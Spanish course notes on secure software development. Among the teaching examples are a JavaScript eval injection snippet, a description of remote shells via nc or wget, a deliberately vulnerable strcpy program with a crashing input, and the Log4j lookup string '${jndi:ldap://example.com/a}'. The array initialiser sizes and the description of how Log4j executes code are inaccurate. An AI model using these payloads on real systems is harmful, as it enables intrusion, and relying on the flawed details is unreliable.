# Desarrollo de software seguro

Muchas vulnerabilidades provienen de malas prácticas de programación, errores
(*bugs*) y por diseños inadecuados (*flaws*).

El desarrollo de software seguro requiere que el diseño del mismo contemple
posibles amenazas y ataques para en lo posible prevenirlos o lograr que el
sistema sea inmune a ellos.

Esto requiere que en el diseño se definan los mecanismos a usar de seguridad
como por ejemplo, lenguajes de programación con gestión segura (*safe*) de la
memoria, bibliotecas o frameworks criptográficos y otros.

Un sistema de sofware que tenga datos confidenciales y otros públicos debe
prevenir que existan flujos de información desde los confidenciales a los
públicos. Es común que en un programa existan flujos implícitos (no tenidos en
cuenta en el diseño y la implementación). Estos flujos implícitos se conocen
comúnmente como ***canales encubiertos***.

## Flujo de información

Para garantizar la confidencialidad de los datos es necesario tener en cuenta
desde el diseño inicial la clasificación de éstos. Algunos datos serán públícos
y otros secretos.

Un modelo teórico basado en *flujo de información* permite determinar el tipo de
operaciones a realizar sobre los datos con el fin de evitar flujos no deseados
que puedan revelar o inferir información confidencial.

Un modelo de flujo de información clasifica los datos en *clases*. Entre las
clases $A$ y $B$ hay una relación $A \leq B$. Cada variable en un programa
pertenece a una clase. La relación $A \leq B$ indica que el flujo sólo puede ir
en dirección $A \rightarrow B$.

Suponiendo que la variable $x \in HIGH$ y la variable $y \in LOW$, con $LOW \leq
HIGH$, el siguiente programa no puede ser *certificado*, es decir no garantiza
condifencialidad ya que existe un flujo implícito de $x \rightarrow y$.

``` c
if (x < 0) y = 1; else y = 0;
```

El fragmento de programa filtra parte de la información secreta (la variable `y`
al menos indica si `x` es positiva o negativa).

El uso de herramientas basados en sistemas de tipos o análisis estático podrían
detectar estos problemas de seguridad.

A modo de ejemplo, la regla para una sentencia de asignación de un sistema de tipo de *information flow* podrían describirse como.

`a = b` es válida sí y sólo si $a \in H$ y $b \in L$ y $L \leq H$

## Vulnerabilidades en software

El CWE/SANS publica periódicamente la lista de los 25 errores de software que
producen vulnerabilidaes.

Esos errores se clasifican en las siguientes categorías:

1. Interacción insegura entre componentes: Mala verificación entradas con
   consecuencias como inyección de código, cross-site-scripting, etc.
2. Manejo de recursos inapropiados: Copia de buffers sin verificación de
   espacio, uso de funciones potencialmente peligrosas, cálculos incorrectos de
   tamaños de buffers, overflow de valores numéricos y accesos fuera de rango.
3. Defensas pobres: Falta de autenticación o autorización, credenciales
   hard-coded, falta de controles de acceso a recursos.

Algunos de las vulnerabilidades se deben a errores (*bugs*), mientras que otros
se deben a falta de uso de ciertas disciplinas o errores de diseño (*flaws*).

A los errores o flaws mencionados deberían agregarse la gestión de recursos
inapropiados. Por ejemplo, un programa con una función que deja *memory leaks*
porque no libera memoria que no usará más es susceptible a un ataque de DoS
haciendo que ejecute esa función repetidamente.

Otro ataque por DoS comúnmente inyectando SQL es que no se verifica
apropiadamente el input y permite hacer una operación extremadamente complejo
(como un gran join).

## Programación defensiva

Esta técnica se caracteriza básicamente en asumir que cada argumento de cada
función debe cumplir con los valores esperados, asumiendo un ambiente hostil
(bajo ataques).

La programación se basa en una disciplina de verificación de los datos de
entrada sin asumir que son responsabilidades del invocante.

Esta disciplina comúnmente requiere el uso y la verificación de *pre* y *pos*
condiciones en cada función, basado en *métodos de desarrollo por contratos*.

Algunos lenguajes de programación incluyen la posibilidad de definir contratos
nativamente, como por ejemplo, [Eiffel](https://Eiffel.org/). En otros
lenguajes, comúnmente se desarrollan bibliotecas con este objetivo.

## Ataques en datos de entrada

Los ataques que aprovechan las vulnerabilidades de una falta o pobre
verificación de inputs, permiten

- Inyectar código (SQL, javascript, etc): Principalmente en aquellas
  aplicaciones que usan otros lenguajes internamente como SQL o interpretan
  código como Javascript, Python, Lua, etc. Los navegadores web interpretan
  varios lenguajes, principalmente Javascript.

  ``` javascript
  // inputfield is a text field of form filled by user
  // The user should input a number in it
  x = eval(myinputfield + 1);
  // what if myinputfield contains "console.log(window.sessionKey)"?
  ```

  Listado 1: Ejemplo de inyección de código Javascript.

- Inyección de comandos: Similar al anterior pero se aprovecha de una entrada en
  una variable que será usada para ejecutar un comando del sistema.

- Cross-Site Scripting (XSS) en aplicaciones web: El atacante logra incluir
  código Javascript en una página web.

  - *Reflected XSS*: El atacante descubre una vulnerabilidad en un enlace de una
    aplicación web (comúnmente en un *query*). La aplicación retorna HTML que
    contiene parte del query ingresado en el url, como se muestra en la
    siguiente figura.

    ![reflected-XSS](img/xss-example-1.gif)

    Figura 1: Ejemplo de un ataque XSS reflejado.
    
    El atacante envía a una víctima un enlace con un script como parte del
    query. La víctima recibe el enlace estando en una sesión de la aplicación
    vulnerable. Al hacer click en el enlace el servidor responderá con una
    página que contiene el script, el cual será ejecutado por el navegador. El
    script del atacante podría, por ejemplo, enviar el identificador de sesión
    a su servidor para luego poder ingresar al sitio con el token de
    autenticación de la víctima.

  - *Stored (persistent) XSS*: El atacante logra incluir un script en un dato
    que será almacenado por la aplicación y luego ésta genera una página con ese
    dato como contenido. Cualquier usuario al requerir esa página, ésta incluirá el
    script que será ejecutada por el browser.

Las vulnerabilidades de inyección de comandos pueden tener consecuencias muy
serias. El atacante puede ejecutar comandos del sistema o descargar aplicaciones
para poder acceder al sistema. Por ejemplo si existiera el comando `nc` (netcat)
puede ejecutarlo como cliente a un servidor del atacante y usarlo como un
*remote shell*. Sino, podría descargarlo (con `wget` o `curl`) o descargar otro
programa equivalente como un *reverse tcp* que implemente un simple shell remoto
para ejecutar comandos desde el equipo del atacante.

> [!NOTE|label:Reverse tcp]
> Se conoce como un *reverse tcp* a un programa *cliente* que se conecta a un servidor
> remoto y acepta desde éste comandos para ejecutarlos en el host y responde con
> sus salidas. Es muy útil cuando el host atacado está detrás de un firewall que
> no acepta conexiones entrantes.

Los ataques por inyección de sql pueden extraer y alterar datos y posiblemente
ejecutar sentencias sql de administración si el usuario tiene los privilegios
suficientes.

Los ataques de XSS comúnmente se enfocan en *filtrar* credenciales para *robar*
cuentas de usuarios en aplicaciones web.

## Buffer overflows

El desborde de buffer ocurre cuando un proceso accede a un dato (comúnmente un
arreglo) fuera de sus límites en la memoria.

Uno de los principales problemas cuando este error existe potencialmente en una
aplicación, el atacante puede ingresar entradas apropiadas para producir un
buffer overflow y sobre-escribir otras variables contiguas en la memoria.

Las consecuencias pueden ser:

1. Causar un acceso inválido a memoria (*segmentation fault*). En este caso el
   ataque puede ser del tipo *negación de servicio*.
2. Sobre-escribir otras variables y lograr alterar el flujo de ejecución
3. Inyectar código en el stack. Esto sólo puede ocurrir con datos locales a una
   función o método. Estos datos se almacenan en la pila de registros de
   activación de un *thread* del proceso.

La inyección de código comúnmente es el ataque más peligroso ya que permite
prácticamente el control total al atacante.

El ataque de inyección de código en el stack consiste en intentar apilar un dato
(con intrucciones de máquina) en el stack y sobre-escribir la dirección de
retorno con la dirección de la primera instrucción en el tope del stack. Así, el
retorno producirá el salto al código apilado, el cual será ejecutado por la CPU.

El dato apilado se conoce como *payload*.

``` td2svg
  +-----------+ <-- stack top              +-> +----------+
  |   buffer  |                            |   |          |
  |           |                            |   | payload  |
  +-----------+                            |   |          |
  | saved fp  |                            |   |          |
  +-----------+                            |   +----------+
  | ret. addr |--> to caller code          +---+--  ra    |
  +-----------+                                +----------+
  |    ...    | \                              |    ...   |
  |           | |  caller                      |          |
  |           | :> activation                  |          |
  |           | |  record                      |          |
  |           | /                              |          |

 a) Before injection.                       b) After injection.
```

Figura 1: Inyección de código por overflow de stack.

El siguiente listado muestra un programa vulnerable.

```c
... // compile: gcc -fno-stack-protector -o example1 example1.c
void main(int argc, char *argv[])
{
  char buf[10];
  strcpy(buf, argv[1]);     // <--- vulnerable, tainted data
  printf("buf=%s\n", buf);
}
```

```sh
$ ./example1 "hello"
$ hello
$ ./example1 "hello world AAAAAAAAAAAAAAAAAAAAAAAAAA"
$ segmentation fault
```

Al correrlo con diferentes entradas podemos lograr un *crash*.

En el siguiente ejemplo, se muestra cómo un buffer overflow puede sobrescribir
datos adyacentes en la memoria.

```c
...
void main(void)
{
  const char b[4] = {'s','e','c','r','e','t',0};
  char a[N];
  for (int i=0; i <= N; i++)
    a[i] = 'a';
  printf("b[0]=%c", b[0]);
}
```

```sh
$ ./example2
$ b[0]=a
```

Esta sobre-escritura también puede ocurrir en el área de datos estáticos
(variables globales).

## Defensas

La programación defensiva provee una disciplina de programación que no debería
permitir que estos errores puedan ocurrir. Básicamente estas vulnerabilidades se
deben a la falta de verificación de entradas y sus longitudes.

Como es imposible verificar automáticamente que un programa no contenga alguna
vulnerabilidad de este tipo, los sistemas operativos y compiladores implementan
algunas contramedidas ante este tipo de ataques.

La primera consiste en impedir que la cpu ejecute instrucciones en áreas de
código. Esto es posible usando los mecanismos de protección como paginado o
segmentación.

Para algunas aplicaciones, como un intérprete de un lenguaje de programación,
esto es problemático, y se compilan instruyendo al compilador que deshabilite
estos mecanismos. Un intérprete moderno comúnmente usa *Just-In_Time compilation
(JIT)* que consiste en generar código de máquina en memoria para aquellas
funciones invocadas frecuentemente. Esto requiere que al menos un área de datos
(*heap*) tenga permisos de ejecución.

Los compiladores modernos implementan un mecanismo de *detección* de
buffer-overflows que consisten básicamente en poner un valor centinela (o
*canary*) sobre la dirección de retorno. Este valor se genera aleatoriamente. El
compilador genera código que antes de ejecutar la instrucción de retorno, se
verifica el valor del canary generado con el valor en el stack. Si concuerdan,
ejecuta el retorno, sino produce una excepción.

Este mecanismo se basa en *tagging*, es decir asociar *marcas* a diferentes
tipos de datos o instrucciones en memoria para asociarles permisos de acceso o
verificar su integridad.

Estas dos contramedidas a veces no alcanzan. En el primer caso, el payload usado
puede sobre-escribir la dirección de retorno para invocar a código del mismo
programa o funciones de las bibliotecas enlazadas.
Esta técnica se conoce como *return-oriented programming (ROP)*, ya que consiste
en apilar direcciones de retorno a funciones con direcciones de memoria conocidas.

Para evitar la detección del *canary* cambiado, los ataques se realizan en dos
etapas:

1. *Filtrar el canary*:  por ejemplo *apilando argumentos de formato* en
   funciones del tipo `printf()`.
2. *Generar el payload* con el canary obtenido y la dirección de retorno
   deseada.

Para evitar ataques basados en ROP los sistemas operativos intentan impedir que
el atacante sepa de antemano las direcciones de las funciones del programa o la
de sus bibliotecas enlazadas. Para eso en cada creación de un proceso o en cada
biblioteca cargada, su *espacio de memoria* comienza a partir de direcciones
lógicas diferentes (aleatorias). Este mecanismo se conoce como *Address Space
Layout Randomization (ASLR)*.

Estos mecanismos parecen no ser suficientes. Hay informes y publicaciones de
ataques exitosos basados en ROP en dos etapas. La primera trata de filtrar
alguna dirección de algo que no es afectado por ASLR (como la tabla GOT, que
contiene punteros a los *stubs* de resolución de *linking dinámico*) y en la
segunda etapa se construye el *payload* para realizar el ataque final.

La conclusión es que parece que no hay contramedidas 100% efectivas contra este
tipo de ataques, por lo que lo ideal es tener programas seguros.

### Lenguages de programación seguros o inseguros

Si bien los problemas como desbordes de arreglos, referencias colgadas y dejar
lagunas de memoria sólo ocurren en lenguajes considerados *inseguros*, como C y
C++, los programadores comúnmente recurren a lenguajes seguros.

Un lenguaje de programación *safe* es seguro sólo en algunos aspectos. Por
ejemplo, Java se considera un lenguaje seguro ya que no permite el uso de
punteros como en C/C++ y el compilador genera código que verifica cada acceso a
arreglos disparando una excepción.

Estas verificaciones en *run-time* sólo previenen la escritura de datos que no
corresponden (accediendo por medio de referencias colgadas), pero hacen que el
programa finalice de forma anormal, habilitando ataques por DoS.

El hecho que estos lenguajes usen un *garbage collector* para reclamar la
memoria no usada, facilita la gestión de los recursos al programador, ya que se
despreocupa de la liberación. 

El uso de lenguajes seguros sólo puede hacerse en sistemas con requerimientos
bajos o medios de rendimiento.

El uso de garbage collectors y de verificaciones en runtime en cada acceso a
memoria no es gratis. Esto produce una sobrecarga en los tiempos de ejecución y
uso de memoria considerables si los comparamos con programas equivalentes en C o
C++.

Hay sistemas en que el uso de lenguajes con mecanismos de bajo nivel (inseguros)
es prácticamente obligatorio: sistemas operativos, compiladores, y aplicaciones
de uso común como navegadores web en los cuales su complejidad es considerable y
tienen que hacer un uso muy eficiente de los recursos para brindar tiempos de
respuesta aceptables.

Actualmente el lenguaje de programación [Rust](https://www.rust-lang.org/)
aparece como una alternativa mas segura a lenguajes como C y C++. Maneja de la
memoria de manera automática sin usar un garbage collector. Usa un sistema de
tipos basado en *ownership*: Sólo puede existir una referencia mutable a un dato
en un alcance (*scope*) dado. El compilador verifica de manera estática (por
medio de su *borrow checker*) que el programa mantiene este invariante.

Cuando el *owner* finaliza su tiempo de vida es seguro liberar la memoria
referenciada ya que el sistema de tipos asegura que nadie más la usa.

Además, el sistema de tipos impide cometer algunos errores comunes de
concurrencia como *condiciones de carrera* con *threads*.

Obviamente el sistema de tipos impone una disciplina de programación que a veces
es necesario desactivar: Por ejemplo, para implementar ciertas estructuras de
datos es necesario usar pequeñas porciones de código *unsafe* ya que
temporalmente hay que tener *aliasing* y manipular punteros de bajo nivel.

Aún cuando se usa un lenguaje de programación *safe* hay que tener en cuenta que
por debajo se enlaza con la biblioteca estándar del sistema y otras (escritas
comúnmente en C/C++), o sea que en cualquier caso estamos usando componentes que
podrían ser inseguros.

## Ejecución de código externo

Muchas aplicaciones tienen una arquitectura con *plugins* o deben *interpretar*
código en algún lenguaje de scripting.

Podemos mencionar como ejemplos, navegadores web, paquetes de oficina y otros.

Estas aplicaciones, requieren exportar una API a los *plugins* o al lenguaje a
interpretar. El diseño de esa API es crítica para evitar ataques por medio de
ésta. Por ejemplo, si un navegador web exportara una API de archivos locales y
sería posible acceder a los archivos locales por medio de un script en una
página HTML, ésta podría acceder a datos del usuario, lo cual sería catastrófico
en términos de seguridad.

Son muy conocidas las vulnerabilidades de aplicaciones de correo electrónico o paquetes de oficina que ejecutan scripts en mensajes o documentos. El principal
problema de esas aplicaciones es que sus APIs están mal definidas en términos de seguridad.

## Desarrollo seguro

Para efectivamente lograr aplicaciones robustas y seguras hay que incluir la
seguridad como un requisito no funcional fundamental. Para eso hay que adaptar
el método de desarrollo para incluir las siguientes tareas:

1. Testing de seguridad: Incluir casos de tests que permitan determinar la
   resistencia a ataques como los descriptos.
   En el caso de aplicaciones en red, comúnmente ésto se conoce como *testing de
   penetración*.
2. Revisión de código: El análisis de código fuente permite descubrir
   vulnerabilidades que podrían no ser cubiertas por los casos de testing.
   Este proceso puede ser manual o asistido con herramientas de análisis
   estático y otras específicas, como por ejemplo
   [SonarCube](https://www.sonarsource.com/products/sonarqube/),
   [Fortify](https://www.microfocus.com/en-us/cyberres/application-security),
   [Klee]() y otras. Para más información, ver [OWASP-Source Code
   Analysis](https://owasp.org/www-community/Source_Code_Analysis_Tools).
3. Revisión de las vulnerabilidades conocidas en las bibliotecas y frameworks
   usados. Una buena práctica es tener la menor cantidad de dependencias
   posibles.
4. Integrar estos pasos en el proceso de *integración continua*, si se aplica.

Una *web application vulnerability scanner* es una aplicación que
automáticamente intenta, por medio de requerimientos http, encontrar alguna
vulnerabilidad usando patrones como los descriptos. En [OWASP vulnerability
scanning tools](https://owasp.org/www-community/Vulnerability_Scanning_Tools) se
describe una lista de herramientas y servicios comerciales y libres.

Para el análisis de vulnerabilidades en programas en que no se dispone del
código fuente es necesario realizar *ingeniería inversa*.

La ingeniería inversa requiere de herramientas de análisis de binarios, como los
clásicos comandos UNIX `type`, `nm` y `readelf` u `objdump`.

Estos comandos permiten extraer información sobre el tipo de binario (ej:
ELFx86-64 Linux), su *tabla de símbolos* y ver las diferentes secciones y
desensamblar, respectivamente.

Es común el uso de herramientas específicas para ingeniería inversa como
[Ghidra](https://www.ghidra-sre.org/), desarrollada por la
[NSA](https://code.nsa.gov/) y liberada como *open source software*.

## Despliege de aplicaciones

Es difícil asegurar que una aplicación es 100% segura. Para minimizar los
riesgos ante posibles ataques, se recomienda aplicar mecanismos de
*confinamiento*.

Una forma de confinar una aplicación es mediante el uso de un *sand box* basado
en máquinas virtuales o contenedores (como [docker](https://www.docker.com/)).

La máquina virtual o contenedor debería contener sólo los componentes necesarios
para ejecutar la aplicación y en lo posible no debería contener utilidades del
sistema o utilitarios que podrían usarse ante una vulnerabilidad.

Actualmente el uso de contenedores para ejecutar aplicaciones confinadas se ha
convertido en una práctica habitual por los proveedores de servicios (cloud
computing, hosting, etc).

Un contenedor, principalmente sobre sistemas operativos que los soportan
nativamente como GNU-Linux o Free-BSD, es un ambiente (usuarios, procesos,
sistema de archivos, dispositivos, etc) independiente del sistema host raíz.
Esto permite ejecutar aplicaciones en entornos confinados prácticamente con el
mismo rendimiento que una aplicación en el host, si se lo compara con una
arquitectura basada en máquinas virtuales.

Es simple de implementar en un sistema operativo como GNU-Linux ya que éste
provee la conformación de *espacios de nombres* separados (*jails* en FreeBSD).
Las aplicaciones ejecutando en un contenedor son procesos de usuario que usan el
mismo kernel que el host.

``` td2svg
 +-----------------------------+        +-----------------------------+
 |.u       host apps           |        |.u       host apps           |
 | +-----------+ +-----------+ |        | +-----------+ +-----------+ |
 | |    apps   | |   apps    | |        | |   apps    | |   apps    | |
 | +-----------+ +-----------+ |        | |           | |           | |
 | |  gest OS  | |  gest OS  | |        | | container | | container | |
 | +-----------+ +-----------+ |        | +-----------+ +-----------+ |
 | | vcpu ...  | | vcpu ...  | |        |                             |
 | +-----------+ +-----------| |        | +-------------------------+ |
 | |    VM1    | |    VM2    | |        | |.k        kernel         | |
 | +-----------+ +-----------+ |        | +-------------------------+ |
 |        vm  |   ^ vm         |        +-----------------------------+
 |       exit v   | enter      |
 | +-------------------------+ |
 | |.k     hypervisor        | |
 | |       Host kernel       | |
 | +-------------------------+ |
 +-----------------------------+

      a) Virtual machines.                      b) Containers.

<style>
.u {fill: cyan;}
.k {fill: orange;}
</style>
```

En la figura de arriba se puede apreciar la diferencia entre las dos
arquitecturas. Obviamente, el uso de máquinas virtuales insume mayor *overhead*
ya que cuando un *guest OS* intente ejecutar una instrucción privilegiada se
produce una excepción que es *atrapada* (*vm-exit*) por el *hypervisor* del *SO
host* que la *emula* y luego debe retornar al contexto de la VM (*vm-enter*).

Los procesos de cada *container* simplemente se ejecutan en *su propio espacio
de nombres* (processes ids, users ids, chrooted filesystem, virtual network
devices, etc) aislado del resto del sistema anfitrión (*host*).

## Caso de estudio: Log4j

El paquete Java Log4j permite a una aplicación Java generar un *log* de eventos
u operaciones. Además de su servicio de logging permite disparar acciones como
buscar un objeto o dato usando [Java Naming and Directory Interface
(JNDI)](https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface).

JNDI soporta búsqueda en servicios de nombres y directorios como CORBA o LDAP.

Log4j soporta una sintaxis de la forma `${prefix:name}` para describir una
búsqueda de *name* dentro del ambiente (lookup) *prefix*.

Si un atacante logra que una aplicación genere en el log una entrada de la forma
`${jndi:ldap://example.com/a}` éste generará un request al servicio ldap del
servidor dado.

Esto permite que el atacante configure un servidor ldap para que descargue un
objeto Java, el cual será incluido en el log. Varias herramientas operan sobre
el log y comúnmente ejecutan los objetos contenidos en él.

Esta vulnerabilidad permite al atacante inyectar código arbitrario el log del
sistema. Si Log4j tiene la opción de *message loockup sustitution* habilitada,
el código descargado se ejecutará.

Se lograron ataques exitosos mediante esta vulnerabilidad. Uno de ellos fue en
el juego *minecraft*.

Esta vulnerabilidad se catalogó como
[CVE-2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228).

Una gran cantidad de aplicaciones Java fueron afectadas.

Una de las conclusiones que es posible sacar es que una simple biblioteca de
logging, la cual obviamente excede en sus funciones básicas y provee opciones
muy flexibles pero peligrosas.